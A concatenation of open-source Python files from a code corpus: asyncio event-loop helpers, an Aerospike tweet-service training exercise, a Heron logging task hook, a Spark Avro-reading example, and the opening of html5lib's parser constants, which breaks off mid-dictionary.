_event_loop_policy = policy
def get_event_loop():
"""Equivalent to calling get_event_loop_policy().get_event_loop()."""
return get_event_loop_policy().get_event_loop()
def set_event_loop(loop):
"""Equivalent to calling get_event_loop_policy().set_event_loop(loop)."""
get_event_loop_policy().set_event_loop(loop)
def new_event_loop():
"""Equivalent to calling get_event_loop_policy().new_event_loop()."""
return get_event_loop_policy().new_event_loop()
def get_child_watcher():
"""Equivalent to calling get_event_loop_policy().get_child_watcher()."""
return get_event_loop_policy().get_child_watcher()
def set_child_watcher(watcher):
"""Equivalent to calling
get_event_loop_policy().set_child_watcher(watcher)."""
return get_event_loop_policy().set_child_watcher(watcher)
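# Typical module-level usage of these helpers (sketch; some_coroutine is a
# stand-in for application code):
#
#     loop = new_event_loop()
#     set_event_loop(loop)
#     try:
#         loop.run_until_complete(some_coroutine())
#     finally:
#         loop.close()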
| lgpl-3.0 |
skatsuta/aerospike-training | book/answers/Complete/Python/TweetService.py | 2 | 9958 | #!/usr/bin/env python
#
# * Copyright 2012-2014 by Aerospike.
# *
# * Permission is hereby granted, free of charge, to any person obtaining a copy
# * of this software and associated documentation files (the "Software"), to
# * deal in the Software without restriction, including without limitation the
# * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# * sell copies of the Software, and to permit persons to whom the Software is
# * furnished to do so, subject to the following conditions:
# *
# * The above copyright notice and this permission notice shall be included in
# * all copies or substantial portions of the Software.
# *
# * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# * IN THE SOFTWARE.
#
from __future__ import print_function
import aerospike
import sys
import time
import random
from aerospike import predicates as p
class TweetService(object):
def __init__(self, client):
self.client = client
def createTweet(self):
print("\n********** Create Tweet **********\n")
        # **********************
        # ***** Data Model *****
# Namespace: test
# Set: tweets
# Key: <username:<counter>>
# Bins:
# tweet - string
# ts - int (Stores epoch timestamp of the tweet)
# username - string
# Sample Key: dash:1
# Sample Record:
# { tweet: 'Put. A. Bird. On. It.',
# ts: 1408574221,
# username: 'dash'
# }
        # **********************
userRecord = None
userKey = None
tweetKey = None
# Get username
username = str()
username = raw_input("Enter username: ")
if len(username) > 0:
# Check if username exists
meta = None
policy = None
userKey = ("test", "users", username)
(key, metadata,userRecord) = self.client.get(userKey,policy)
record = {}
if userRecord:
# Set Tweet Count
if 'tweetcount' in userRecord:
nextTweetCount = int(userRecord['tweetcount']) + 1
else:
nextTweetCount = 1
# Get tweet
record['tweet'] = raw_input("Enter tweet for " + username + ":")
# Write record
#wPolicy.recordExistsAction = RecordExistsAction.UPDATE
# Create timestamp to store along with the tweet so we can
# query, index and report on it
ts= self.getTimeStamp()
tweetKey = ("test", "tweets", username + ":" + str(nextTweetCount))
record["ts"] = ts
record["username"]= username
self.client.put(tweetKey,record, meta, policy)
print("\nINFO: Tweet record created!\n",record,tweetKey)
# Update tweet count and last tweet'd timestamp in the user
# record
self.updateUser(self.client, userKey, policy, ts, nextTweetCount)
else:
print("ERROR: User record not found!\n")
def scanAllTweetsForAllUsers(self):
try:
# Python Scan
tweetScan = self.client.scan("test", "tweets")
tweetScan.select('tweet')
# callback for each record read
def tweetCallback((key, meta, record)):
print(record)
# invoke the operations, and for each record invoke the callback
tweetScan.foreach(tweetCallback)
except Exception as e :
print("error: {0}".format(e), file=sys.stderr)
def updateUser(self, client, userKey, policy, ts, tweetCount):
userTweet = {}
userTweet["tweetcount"] = tweetCount
userTweet["lasttweeted"] = ts
meta = None
self.client.put(userKey,userTweet, meta, policy)
print("\nINFO: The tweet count now is: " , tweetCount)
    def updateUserUsingOperate(self, client, userKey, policy, ts):
        # Increment the tweet count, write the last-tweeted timestamp and
        # read the new count back in a single operate() call.
        operations = [{'op': aerospike.OPERATOR_INCR, 'bin': 'tweetcount', 'val': 1},
                      {'op': aerospike.OPERATOR_WRITE, 'bin': 'lasttweeted', 'val': ts},
                      {'op': aerospike.OPERATOR_READ, 'bin': 'tweetcount'}]
        (key, meta, record) = self.client.operate(userKey, operations, None, policy)
        print("\nINFO: The tweet count now is: ", record["tweetcount"])
def queryTweetsByUsername(self):
print("\n********** Query Tweets By Username **********\n")
# Get username
username = str()
username = raw_input("Enter username: ")
if len(username) > 0:
try:
self.client.index_string_create(None, "test", "tweets", "username", "username_index")
time.sleep(5)
print("\nINFO: String Secondary Index Created ")
tweetQuery = self.client.query("test", "tweets")
#tweetQuery.select('username')
# callback for each record read
def tweetQueryCallback((key, meta, record)):
print(record["tweet"])
# invoke the operations, and for each record invoke the callback
tweetQuery.where(p.equals('username',username))
tweetQuery.foreach(tweetQueryCallback)
except Exception as e :
print("error: {0}".format(e), file=sys.stderr)
def queryUsersByTweetCount(self):
print("\n********** Query Users By Tweet Count Range **********\n")
# Get username
try:
self.client.index_integer_create(None, "test", "users", "tweetcount", "tweetcount_index")
time.sleep(5)
print("\nINFO: Integer Secondary Index Created ")
min = int(raw_input("Enter Min Tweet Count: "))
max = int(raw_input("Enter Max Tweet Count: "))
print("\nList of users with " , min , "-" , max , " tweets:\n")
tweetQuery = self.client.query("test", "users")
#tweetQuery.select('username')
# callback for each record read
def tweetQueryCountCallback((key, meta, record)):
print(record["username"] , " has " , record["tweetcount"] , " tweets\n")
# invoke the operations, and for each record invoke the callback
tweetQuery.where(p.between('tweetcount',min,max))
tweetQuery.foreach(tweetQueryCountCallback)
except Exception as e :
print("error: {0}".format(e), file=sys.stderr)
def getTimeStamp(self):
""" generated source for method getTimeStamp """
return int(round(time.time() * 1000))
def createTweets(self):
randomTweets = ["For just $1 you get a half price download of half of the song and listen to it just once.", "People tell me my body looks like a melted candle", "Come on movie! Make it start!", "Byaaaayy", "Please, please, win! Meow, meow, meow!", "Put. A. Bird. On. It.", "A weekend wasted is a weekend well spent", "Would you like to super spike your meal?", "We have a mean no-no-bring-bag up here on aisle two.", "SEEK: See, Every, EVERY, Kind... of spot", "We can order that for you. It will take a year to get there.", "If you are pregnant, have a soda.", "Hear that snap? Hear that clap?", "Follow me and I may follow you", "Which is the best cafe in Portland? Discuss...", "Portland Coffee is for closers!", "Lets get this party started!", "How about them portland blazers!", "You got school'd, yo", "I love animals", "I love my dog", "What's up Portland", "Which is the best cafe in Portland? Discuss...", "I dont always tweet, but when I do it is on Tweetaspike"]
totalUsers = 10000
maxTweets = 20
username = str()
ts = 0
        wr_policy = {
            'exists': aerospike.POLICY_EXISTS_IGNORE
        }
print("\nCreate up to " , maxTweets , " tweets each for " , totalUsers , " users. Press any key to continue...\n")
raw_input("..")
j = 0
while j < totalUsers:
username = "user" + str(random.randint(1,totalUsers))
userKey = ("test", "users", username)
meta = None
policy = None
ts = None
k = 0
(key, metadata,userRecord) = self.client.get(userKey,policy)
if userRecord:
totalTweets = random.randint(1,maxTweets)
                while k < totalTweets:
record = {}
ts = self.getTimeStamp()
tweetKey = ("test", "tweets", username + ":" + str(k))
record["tweet"] = random.choice(randomTweets)
record["ts"] = ts
record["username"]= username
self.client.put(tweetKey,record, meta, wr_policy)
k += 1
# Create timestamp to store along with the tweet so we can
# query, index and report on it
print("\nWrote " , totalTweets , " tweets for " , username , "!")
if totalTweets > 0:
# Update tweet count and last tweet'd timestamp in the user
# record
self.updateUser(self.client, userKey, wr_policy, ts, totalTweets)
j += 1
print("\n\nDone creating up to " , maxTweets , " tweets each for " , totalUsers , " users!\n")
| mit |
wangli1426/heron | heron/examples/src/python/misc/test_task_hook.py | 8 | 2350 | # Copyright 2016 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''module for example task hook'''
from collections import Counter
from heron.common.src.python.utils.log import Log
from heron.common.src.python.utils.topology import ITaskHook
# pylint: disable=unused-argument
class TestTaskHook(ITaskHook):
"""TestTaskHook logs event information every 10000 times"""
CONST = 10000
def prepare(self, conf, context):
Log.info("In prepare of TestTaskHook")
self.counter = Counter()
# pylint: disable=no-self-use
def clean_up(self):
Log.info("In clean_up of TestTaskHook")
def emit(self, emit_info):
self.counter['emit'] += 1
if self.counter['emit'] % self.CONST == 0:
Log.info("TestTaskHook: emitted %s tuples" % str(self.counter['emit']))
def spout_ack(self, spout_ack_info):
self.counter['sp_ack'] += 1
if self.counter['sp_ack'] % self.CONST == 0:
Log.info("TestTaskHook: spout acked %s tuples" % str(self.counter['sp_ack']))
def spout_fail(self, spout_fail_info):
self.counter['sp_fail'] += 1
if self.counter['sp_fail'] % self.CONST == 0:
Log.info("TestTaskHook: spout failed %s tuples" % str(self.counter['sp_fail']))
def bolt_execute(self, bolt_execute_info):
self.counter['bl_exec'] += 1
if self.counter['bl_exec'] % self.CONST == 0:
Log.info("TestTaskHook: bolt executed %s tuples" % str(self.counter['bl_exec']))
def bolt_ack(self, bolt_ack_info):
self.counter['bl_ack'] += 1
if self.counter['bl_ack'] % self.CONST == 0:
Log.info("TestTaskHook: bolt acked %s tuples" % str(self.counter['bl_ack']))
def bolt_fail(self, bolt_fail_info):
self.counter['bl_fail'] += 1
if self.counter['bl_fail'] % self.CONST == 0:
Log.info("TestTaskHook: bolt failed %s tuples" % str(self.counter['bl_fail']))
| apache-2.0 |
guoxiaolongzte/spark | examples/src/main/python/avro_inputformat.py | 51 | 3170 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Read data file users.avro in local Spark distro:
$ cd $SPARK_HOME
$ ./bin/spark-submit --driver-class-path /path/to/example/jar \
> ./examples/src/main/python/avro_inputformat.py \
> examples/src/main/resources/users.avro
{u'favorite_color': None, u'name': u'Alyssa', u'favorite_numbers': [3, 9, 15, 20]}
{u'favorite_color': u'red', u'name': u'Ben', u'favorite_numbers': []}
To read name and favorite_color fields only, specify the following reader schema:
$ cat examples/src/main/resources/user.avsc
{"namespace": "example.avro",
"type": "record",
"name": "User",
"fields": [
{"name": "name", "type": "string"},
{"name": "favorite_color", "type": ["string", "null"]}
]
}
$ ./bin/spark-submit --driver-class-path /path/to/example/jar \
> ./examples/src/main/python/avro_inputformat.py \
> examples/src/main/resources/users.avro examples/src/main/resources/user.avsc
{u'favorite_color': None, u'name': u'Alyssa'}
{u'favorite_color': u'red', u'name': u'Ben'}
"""
from __future__ import print_function
import sys
from functools import reduce
from pyspark.sql import SparkSession
if __name__ == "__main__":
if len(sys.argv) != 2 and len(sys.argv) != 3:
print("""
Usage: avro_inputformat <data_file> [reader_schema_file]
Run with example jar:
./bin/spark-submit --driver-class-path /path/to/example/jar \
/path/to/examples/avro_inputformat.py <data_file> [reader_schema_file]
Assumes you have Avro data stored in <data_file>. Reader schema can be optionally specified
in [reader_schema_file].
""", file=sys.stderr)
sys.exit(-1)
path = sys.argv[1]
spark = SparkSession\
.builder\
.appName("AvroKeyInputFormat")\
.getOrCreate()
sc = spark.sparkContext
conf = None
if len(sys.argv) == 3:
schema_rdd = sc.textFile(sys.argv[2], 1).collect()
conf = {"avro.schema.input.key": reduce(lambda x, y: x + y, schema_rdd)}
avro_rdd = sc.newAPIHadoopFile(
path,
"org.apache.avro.mapreduce.AvroKeyInputFormat",
"org.apache.avro.mapred.AvroKey",
"org.apache.hadoop.io.NullWritable",
keyConverter="org.apache.spark.examples.pythonconverters.AvroWrapperToJavaConverter",
conf=conf)
output = avro_rdd.map(lambda x: x[0]).collect()
for k in output:
print(k)
spark.stop()
| apache-2.0 |
dpendl00/headphones | lib/html5lib/constants.py | 963 | 87346 | from __future__ import absolute_import, division, unicode_literals
import string
import gettext
_ = gettext.gettext
EOF = None
E = {
"null-character":
_("Null character in input stream, replaced with U+FFFD."),
"invalid-codepoint":
_("Invalid codepoint in stream."),
"incorrectly-placed-solidus":
_("Solidus (/) incorrectly placed in tag."),
"incorrect-cr-newline-entity":
_("Incorrect CR newline entity, replaced with LF."),
"illegal-windows-1252-entity":
_("Entity used with illegal number (windows-1252 reference)."),
"cant-convert-numeric-entity":
_("Numeric entity couldn't be converted to character "
"(codepoint U+%(charAsInt)08x)."),
"illegal-codepoint-for-numeric-entity":
_("Numeric entity represents an illegal codepoint: "
"U+%(charAsInt)08x."),
"numeric-entity-without-semicolon":
_("Numeric entity didn't end with ';'."),
"expected-numeric-entity-but-got-eof":
_("Numeric entity expected. Got end of file instead."),
"expected-numeric-entity":
_("Numeric entity expected but none found."),
"named-entity-without-semicolon":
_("Named entity didn't end with ';'."),
"expected-named-entity":
_("Named entity expected. Got none."),
"attributes-in-end-tag":
_("End tag contains unexpected attributes."),
'self-closing-flag-on-end-tag':
_("End tag contains unexpected self-closing flag."),
"expected-tag-name-but-got-right-bracket":
_("Expected tag name. Got '>' instead."),
"expected-tag-name-but-got-question-mark":
_("Expected tag name. Got '?' instead. (HTML doesn't "
"support processing instructions.)"),
"expected-tag-name":
_("Expected tag name. Got something else instead"),
"expected-closing-tag-but-got-right-bracket":
_("Expected closing tag. Got '>' instead. Ignoring '</>'."),
"expected-closing-tag-but-got-eof":
_("Expected closing tag. Unexpected end of file."),
"expected-closing-tag-but-got-char":
_("Expected closing tag. Unexpected character '%(data)s' found."),
"eof-in-tag-name":
_("Unexpected end of file in the tag name."),
"expected-attribute-name-but-got-eof":
_("Unexpected end of file. Expected attribute name instead."),
"eof-in-attribute-name":
_("Unexpected end of file in attribute name."),
"invalid-character-in-attribute-name":
_("Invalid character in attribute name"),
"duplicate-attribute":
_("Dropped duplicate attribute on tag."),
"expected-end-of-tag-name-but-got-eof":
_("Unexpected end of file. Expected = or end of tag."),
"expected-attribute-value-but-got-eof":
_("Unexpected end of file. Expected attribute value."),
"expected-attribute-value-but-got-right-bracket":
_("Expected attribute value. Got '>' instead."),
'equals-in-unquoted-attribute-value':
_("Unexpected = in unquoted attribute"),
'unexpected-character-in-unquoted-attribute-value':
_("Unexpected character in unquoted attribute"),
"invalid-character-after-attribute-name":
_("Unexpected character after attribute name."),
"unexpected-character-after-attribute-value":
_("Unexpected character after attribute value."),
"eof-in-attribute-value-double-quote":
_("Unexpected end of file in attribute value (\")."),
"eof-in-attribute-value-single-quote":
_("Unexpected end of file in attribute value (')."),
"eof-in-attribute-value-no-quotes":
_("Unexpected end of file in attribute value."),
"unexpected-EOF-after-solidus-in-tag":
_("Unexpected end of file in tag. Expected >"),
"unexpected-character-after-solidus-in-tag":
_("Unexpected character after / in tag. Expected >"),
"expected-dashes-or-doctype":
_("Expected '--' or 'DOCTYPE'. Not found."),
"unexpected-bang-after-double-dash-in-comment":
_("Unexpected ! after -- in comment"),
"unexpected-space-after-double-dash-in-comment":
_("Unexpected space after -- in comment"),
"incorrect-comment":
_("Incorrect comment."),
"eof-in-comment":
_("Unexpected end of file in comment."),
"eof-in-comment-end-dash":
_("Unexpected end of file in comment (-)"),
"unexpected-dash-after-double-dash-in-comment":
_("Unexpected '-' after '--' found in comment."),
"eof-in-comment-double-dash":
_("Unexpected end of file in comment (--)."),
"eof-in-comment-end-space-state":
_("Unexpected end of file in comment."),
"eof-in-comment-end-bang-state":
_("Unexpected end of file in comment."),
"unexpected-char-in-comment":
_("Unexpected character in comment found."),
"need-space-after-doctype":
_("No space after literal string 'DOCTYPE'."),
"expected-doctype-name-but-got-right-bracket":
_("Unexpected > character. Expected DOCTYPE name."),
"expected-doctype-name-but-got-eof":
_("Unexpected end of file. Expected DOCTYPE name."),
"eof-in-doctype-name":
_("Unexpected end of file in DOCTYPE name."),
"eof-in-doctype":
_("Unexpected end of file in DOCTYPE."),
"expected-space-or-right-bracket-in-doctype":
_("Expected space or '>'. Got '%(data)s'"),
"unexpected-end-of-doctype":
_("Unexpected end of DOCTYPE."),
"unexpected-char-in-doctype":
_("Unexpected character in DOCTYPE."),
"eof-in-innerhtml":
_("XXX innerHTML EOF"),
"unexpected-doctype":
_("Unexpected DOCTYPE. Ignored."),
"non-html-root":
_("html needs to be the first start tag."),
"expected-doctype-but-got-eof":
_("Unexpected End of file. Expected DOCTYPE."),
"unknown-doctype":
_("Erroneous DOCTYPE."),
"expected-doctype-but-got-chars":
_("Unexpected non-space characters. Expected DOCTYPE."),
"expected-doctype-but-got-start-tag":
_("Unexpected start tag (%(name)s). Expected DOCTYPE."),
"expected-doctype-but-got-end-tag":
_("Unexpected end tag (%(name)s). Expected DOCTYPE."),
"end-tag-after-implied-root":
_("Unexpected end tag (%(name)s) after the (implied) root element."),
"expected-named-closing-tag-but-got-eof":
_("Unexpected end of file. Expected end tag (%(name)s)."),
"two-heads-are-not-better-than-one":
_("Unexpected start tag head in existing head. Ignored."),
"unexpected-end-tag":
_("Unexpected end tag (%(name)s). Ignored."),
"unexpected-start-tag-out-of-my-head":
_("Unexpected start tag (%(name)s) that can be in head. Moved."),
"unexpected-start-tag":
_("Unexpected start tag (%(name)s)."),
"missing-end-tag":
_("Missing end tag (%(name)s)."),
"missing-end-tags":
_("Missing end tags (%(name)s)."),
"unexpected-start-tag-implies-end-tag":
_("Unexpected start tag (%(startName)s) "
"implies end tag (%(endName)s)."),
"unexpected-start-tag-treated-as":
_("Unexpected start tag (%(originalName)s). Treated as %(newName)s."),
"deprecated-tag":
_("Unexpected start tag %(name)s. Don't use it!"),
"unexpected-start-tag-ignored":
_("Unexpected start tag %(name)s. Ignored."),
"expected-one-end-tag-but-got-another":
_("Unexpected end tag (%(gotName)s). "
"Missing end tag (%(expectedName)s)."),
"end-tag-too-early":
_("End tag (%(name)s) seen too early. Expected other end tag."),
"end-tag-too-early-named":
_("Unexpected end tag (%(gotName)s). Expected end tag (%(expectedName)s)."),
"end-tag-too-early-ignored":
_("End tag (%(name)s) seen too early. Ignored."),
"adoption-agency-1.1":
_("End tag (%(name)s) violates step 1, "
"paragraph 1 of the adoption agency algorithm."),
"adoption-agency-1.2":
_("End tag (%(name)s) violates step 1, "
"paragraph 2 of the adoption agency algorithm."),
"adoption-agency-1.3":
_("End tag (%(name)s) violates step 1, "
"paragraph 3 of the adoption agency algorithm."),
"adoption-agency-4.4":
_("End tag (%(name)s) violates step 4, "
"paragraph 4 of the adoption agency algorithm."),
"unexpected-end-tag-treated-as":
_("Unexpected end tag (%(originalName)s). Treated as %(newName)s."),
"no-end-tag":
_("This element (%(name)s) has no end tag."),
"unexpected-implied-end-tag-in-table":
_("Unexpected implied end tag (%(name)s) in the table phase."),
"unexpected-implied-end-tag-in-table-body":
_("Unexpected implied end tag (%(name)s) in the table body phase."),
"unexpected-char-implies-table-voodoo":
_("Unexpected non-space characters in "
"table context caused voodoo mode."),
"unexpected-hidden-input-in-table":
_("Unexpected input with type hidden in table context."),
"unexpected-form-in-table":
_("Unexpected form in table context."),
"unexpected-start-tag-implies-table-voodoo":
_("Unexpected start tag (%(name)s) in "
"table context caused voodoo mode."),
"unexpected-end-tag-implies-table-voodoo":
_("Unexpected end tag (%(name)s) in "
"table context caused voodoo mode."),
"unexpected-cell-in-table-body":
_("Unexpected table cell start tag (%(name)s) "
"in the table body phase."),
"unexpected-cell-end-tag":
_("Got table cell end tag (%(name)s) "
"while required end tags are missing."),
"unexpected-end-tag-in-table-body":
_("Unexpected end tag (%(name)s) in the table body phase. Ignored."),
"unexpected-implied-end-tag-in-table-row":
_("Unexpected implied end tag (%(name)s) in the table row phase."),
"unexpected-end-tag-in-table-row":
_("Unexpected end tag (%(name)s) in the table row phase. Ignored."),
"unexpected-select-in-select":
_("Unexpected select start tag in the select phase "
"treated as select end tag."),
"unexpected-input-in-select":
_("Unexpected input start tag in the select phase."),
"unexpected-start-tag-in-select":
_("Unexpected start tag token (%(name)s in the select phase. "
"Ignored."),
"unexpected-end-tag-in-select":
_("Unexpected end tag (%(name)s) in the select phase. Ignored."),
"unexpected-table-element-start-tag-in-select-in-table":
_("Unexpected table element start tag (%(name)s) in the select in table phase."),
"unexpected-table-element-end-tag-in-select-in-table":
_("Unexpected table element end tag (%(name)s) in the select in table phase."),
"unexpected-char-after-body":
_("Unexpected non-space characters in the after body phase."),
"unexpected-start-tag-after-body":
_("Unexpected start tag token (%(name)s)"
" in the after body phase."),
"unexpected-end-tag-after-body":
_("Unexpected end tag token (%(name)s)"
" in the after body phase."),
"unexpected-char-in-frameset":
_("Unexpected characters in the frameset phase. Characters ignored."),
"unexpected-start-tag-in-frameset":
_("Unexpected start tag token (%(name)s)"
" in the frameset phase. Ignored."),
"unexpected-frameset-in-frameset-innerhtml":
_("Unexpected end tag token (frameset) "
"in the frameset phase (innerHTML)."),
"unexpected-end-tag-in-frameset":
_("Unexpected end tag token (%(name)s)"
" in the frameset phase. Ignored."),
"unexpected-char-after-frameset":
_("Unexpected non-space characters in the "
"after frameset phase. Ignored."),
"unexpected-start-tag-after-frameset":
_("Unexpected start tag (%(name)s)"
" in the after frameset phase. Ignored."),
"unexpected-end-tag-after-frameset":
_("Unexpected end tag (%(name)s)"
" in the after frameset phase. Ignored."),
"unexpected-end-tag-after-body-innerhtml":
_("Unexpected end tag after body(innerHtml)"),
"expected-eof-but-got-char":
_("Unexpected non-space characters. Expected end of file."),
"expected-eof-but-got-start-tag":
_("Unexpected start tag (%(name)s)"
". Expected end of file."),
"expected-eof-but-got-end-tag":
_("Unexpected end tag (%(name)s)"
". Expected end of file."),
"eof-in-table":
_("Unexpected end of file. Expected table content."),
"eof-in-select":
_("Unexpected end of file. Expected select content."),
"eof-in-frameset":
_("Unexpected end of file. Expected frameset content."),
"eof-in-script-in-script":
_("Unexpected end of file. Expected script content."),
"eof-in-foreign-lands":
_("Unexpected end of file. Expected foreign content"),
"non-void-element-with-trailing-solidus":
_("Trailing solidus not allowed on element %(name)s"),
"unexpected-html-element-in-foreign-content":
_("Element %(name)s not allowed in a non-html context"),
"unexpected-end-tag-before-html":
_("Unexpected end tag (%(name)s) before html."),
"XXX-undefined-error":
_("Undefined error (this sucks and should be fixed)"),
}
namespaces = {
"html": "http://www.w3.org/1999/xhtml",
"mathml": "http://www.w3.org/1998/Math/MathML",
"svg": "http://www.w3.org/2000/svg",
"xlink": "http://www.w3.org/1999/xlink",
"xml": "http://www.w3.org/XML/1998/namespace",
"xmlns": "http://www.w3.org/2000/xmlns/"
}
scopingElements = frozenset((
(namespaces["html"], "applet"),
(namespaces["html"], "caption"),
(namespaces["html"], "html"),
(namespaces["html"], "marquee"),
(namespaces["html"], "object"),
(namespaces["html"], "table"),
(namespaces["html"], "td"),
(namespaces["html"], "th"),
(namespaces["mathml"], "mi"),
(namespaces["mathml"], "mo"),
(namespaces["mathml"], "mn"),
(namespaces["mathml"], "ms"),
(namespaces["mathml"], "mtext"),
(namespaces["mathml"], "annotation-xml"),
(namespaces["svg"], "foreignObject"),
(namespaces["svg"], "desc"),
(namespaces["svg"], "title"),
))
formattingElements = frozenset((
(namespaces["html"], "a"),
(namespaces["html"], "b"),
(namespaces["html"], "big"),
(namespaces["html"], "code"),
(namespaces["html"], "em"),
(namespaces["html"], "font"),
(namespaces["html"], "i"),
(namespaces["html"], "nobr"),
(namespaces["html"], "s"),
(namespaces["html"], "small"),
(namespaces["html"], "strike"),
(namespaces["html"], "strong"),
(namespaces["html"], "tt"),
(namespaces["html"], "u")
))
specialElements = frozenset((
(namespaces["html"], "address"),
(namespaces["html"], "applet"),
(namespaces["html"], "area"),
(namespaces["html"], "article"),
(namespaces["html"], "aside"),
(namespaces["html"], "base"),
(namespaces["html"], "basefont"),
(namespaces["html"], "bgsound"),
(namespaces["html"], "blockquote"),
(namespaces["html"], "body"),
(namespaces["html"], "br"),
(namespaces["html"], "button"),
(namespaces["html"], "caption"),
(namespaces["html"], "center"),
(namespaces["html"], "col"),
(namespaces["html"], "colgroup"),
(namespaces["html"], "command"),
(namespaces["html"], "dd"),
(namespaces["html"], "details"),
(namespaces["html"], "dir"),
(namespaces["html"], "div"),
(namespaces["html"], "dl"),
(namespaces["html"], "dt"),
(namespaces["html"], "embed"),
(namespaces["html"], "fieldset"),
(namespaces["html"], "figure"),
(namespaces["html"], "footer"),
(namespaces["html"], "form"),
(namespaces["html"], "frame"),
(namespaces["html"], "frameset"),
(namespaces["html"], "h1"),
(namespaces["html"], "h2"),
(namespaces["html"], "h3"),
(namespaces["html"], "h4"),
(namespaces["html"], "h5"),
(namespaces["html"], "h6"),
(namespaces["html"], "head"),
(namespaces["html"], "header"),
(namespaces["html"], "hr"),
(namespaces["html"], "html"),
(namespaces["html"], "iframe"),
# Note that image is commented out in the spec as "this isn't an
# element that can end up on the stack, so it doesn't matter,"
(namespaces["html"], "image"),
(namespaces["html"], "img"),
(namespaces["html"], "input"),
(namespaces["html"], "isindex"),
(namespaces["html"], "li"),
(namespaces["html"], "link"),
(namespaces["html"], "listing"),
(namespaces["html"], "marquee"),
(namespaces["html"], "menu"),
(namespaces["html"], "meta"),
(namespaces["html"], "nav"),
(namespaces["html"], "noembed"),
(namespaces["html"], "noframes"),
(namespaces["html"], "noscript"),
(namespaces["html"], "object"),
(namespaces["html"], "ol"),
(namespaces["html"], "p"),
(namespaces["html"], "param"),
(namespaces["html"], "plaintext"),
(namespaces["html"], "pre"),
(namespaces["html"], "script"),
(namespaces["html"], "section"),
(namespaces["html"], "select"),
(namespaces["html"], "style"),
(namespaces["html"], "table"),
(namespaces["html"], "tbody"),
(namespaces["html"], "td"),
(namespaces["html"], "textarea"),
(namespaces["html"], "tfoot"),
(namespaces["html"], "th"),
(namespaces["html"], "thead"),
(namespaces["html"], "title"),
(namespaces["html"], "tr"),
(namespaces["html"], "ul"),
(namespaces["html"], "wbr"),
(namespaces["html"], "xmp"),
(namespaces["svg"], "foreignObject")
))
htmlIntegrationPointElements = frozenset((
(namespaces["mathml"], "annotaion-xml"),
(namespaces["svg"], "foreignObject"),
(namespaces["svg"], "desc"),
(namespaces["svg"], "title")
))
mathmlTextIntegrationPointElements = frozenset((
(namespaces["mathml"], "mi"),
(namespaces["mathml"], "mo"),
(namespaces["mathml"], "mn"),
(namespaces["mathml"], "ms"),
(namespaces["mathml"], "mtext")
))
adjustForeignAttributes = {
"xlink:actuate": ("xlink", "actuate", namespaces["xlink"]),
"xlink:arcrole": ("xlink", "arcrole", namespaces["xlink"]),
"xlink:href": ("xlink", "href", namespaces["xlink"]),
"xlink:role": ("xlink", "role", namespaces["xlink"]),
"xlink:show": ("xlink", "show", namespaces["xlink"]),
"xlink:title": ("xlink", "title", namespaces["xlink"]),
"xlink:type": ("xlink", "type", namespaces["xlink"]),
"xml:base": ("xml", "base", namespaces["xml"]),
"xml:lang": ("xml", "lang", namespaces["xml"]),
"xml:space": ("xml", "space", namespaces["xml"]),
"xmlns": (None, "xmlns", namespaces["xmlns"]),
"xmlns:xlink": ("xmlns", "xlink", namespaces["xmlns"])
}
unadjustForeignAttributes = dict([((ns, local), qname) for qname, (prefix, local, ns) in
adjustForeignAttributes.items()])
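# The inverse map goes from (namespace, local name) back to the qualified
# attribute name, e.g.:
#     unadjustForeignAttributes[(namespaces["xlink"], "href")] == "xlink:href"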
spaceCharacters = frozenset((
"\t",
"\n",
"\u000C",
" ",
"\r"
))
tableInsertModeElements = frozenset((
"table",
"tbody",
"tfoot",
"thead",
"tr"
))
asciiLowercase = frozenset(string.ascii_lowercase)
asciiUppercase = frozenset(string.ascii_uppercase)
asciiLetters = frozenset(string.ascii_letters)
digits = frozenset(string.digits)
hexDigits = frozenset(string.hexdigits)
asciiUpper2Lower = dict([(ord(c), ord(c.lower()))
for c in string.ascii_uppercase])
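# asciiUpper2Lower maps uppercase code points to their lowercase equivalents
# and is suitable for str.translate, e.g.:
#     "HTML".translate(asciiUpper2Lower) == "html"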
# Heading elements need to be ordered
headingElements = (
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
)
voidElements = frozenset((
"base",
"command",
"event-source",
"link",
"meta",
"hr",
"br",
"img",
"embed",
"param",
"area",
"col",
"input",
"source",
"track"
))
cdataElements = frozenset(('title', 'textarea'))
rcdataElements = frozenset((
'style',
'script',
'xmp',
'iframe',
'noembed',
'noframes',
'noscript'
))
booleanAttributes = {
"": frozenset(("irrelevant",)),
"style": frozenset(("scoped",)),
"img": frozenset(("ismap",)),
"audio": frozenset(("autoplay", "controls")),
"video": frozenset(("autoplay", "controls")),
"script": frozenset(("defer", "async")),
"details": frozenset(("open",)),
"datagrid": frozenset(("multiple", "disabled")),
"command": frozenset(("hidden", "disabled", "checked", "default")),
"hr": frozenset(("noshade")),
"menu": frozenset(("autosubmit",)),
"fieldset": frozenset(("disabled", "readonly")),
"option": frozenset(("disabled", "readonly", "selected")),
"optgroup": frozenset(("disabled", "readonly")),
"button": frozenset(("disabled", "autofocus")),
"input": frozenset(("disabled", "readonly", "required", "autofocus", "checked", "ismap")),
